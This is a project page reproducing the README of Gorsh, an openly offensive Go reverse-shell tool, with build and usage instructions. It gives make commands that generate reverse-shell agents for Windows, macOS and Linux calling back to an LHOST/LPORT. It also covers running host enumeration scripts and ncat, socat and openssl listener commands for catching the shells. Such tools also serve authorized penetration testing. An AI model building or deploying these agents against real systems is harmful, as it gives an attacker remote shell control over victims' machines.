audibleblink / Gorsh
Programming Languages
Projects that are alternatives of or similar to Gorsh
gorsh
[go]lang [r]everse [sh]ell
Originally forked from - sysdream/hershell
Fork Changes
Requires go1.11+
See the Changelog
Getting started
git clone [email protected]:audibleblink/gorsh.git
cd gorsh
go get -u github.com/gobuffalo/packr/packr
Be sure to read the Makefile. It gives you a good idea of what's going on.
Using the zstd build tag and windll make target require cgo. Make sure you're familiar with cross-compilation and cgo and have the toolchains for it, or read here if you're feeling adventurous.
Usage
First, generate your certs and ssh keys for the reverse proxy.
$ make depends
Follow the make command's printed instructions on creating an ssh user for the reverse proxy connection.
Create configs/ssh.json. There's an example json file the configs directory.
Generate agents with:
# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make {windows,macos,linux}{32,64} LHOST=example.com LPORT=443
Enumeration Scripts
The enum command will present a selection dialog that allows once to run enumeration scripts based
on the host OS. You can update scripts in scripts/prepare_enum_scripts.sh and run
make enumscripts. Addition of scripts will require modification of
./internal/enum/enum_{windows,linux}.go
Catching the shell
This project ships with a server that catches the reverse shell and still provides shell-like capabilities you lose with traditional reverse shells, including:
- Tab Completion
- Vi-mode readline editing
- History
- Cursor movements
Generate the server with:
make server
build/srv/gorsh-listen --help
The gorsh-listener is a one-to-one relationship, like a traditional shell. For multiple shells, you need to start multiple servers on different ports.
To have the ability to receive multiple shells on the same port, there's the make listen target.
The make listen target kicks off a socat TLS pipe and creates new tmux windows with each new
incoming connection. Feed it a port number as PORT.
socat is essentially acting as a TLS-terminating reverse proxy. The incoming connections are then
handed off to gorsh-listener through randomly generated Unix Domain Sockets.
make listen PORT=8080
# once a client connects, on a different terminal type:
tmux attach -t GORSH
Shells can also be caught without tmux or gorsh-listen using:
- socat (not working on macos)
- ncat
- openssl server module
- metasploit multi handler (with a
python/shell_reverse_tcp_sslpayload)
Examples
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
$ socat stdio OPENSSL-LISTEN:443,cert=server.pem,key=server.key,verify=0
Credits
- Initial Work - @lesnuages
- Modifications - f47h3r - @f47h3r_b0
- @mzpqnxow for figuring out my x-compilation and dependancy problems and troubleshooting guide
- Enumeration scripts courtesy of @411hall @harmj0y @rebootuser